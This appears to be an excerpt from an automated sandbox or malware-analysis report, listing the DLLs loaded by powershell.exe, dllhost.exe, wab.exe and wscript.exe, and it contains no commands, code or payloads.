Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: wininet.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: winhttp.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exe  Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: winmm.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: rstrtmgr.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: policymanager.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: msvcp110_win.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: pstorec.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: pstorec.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
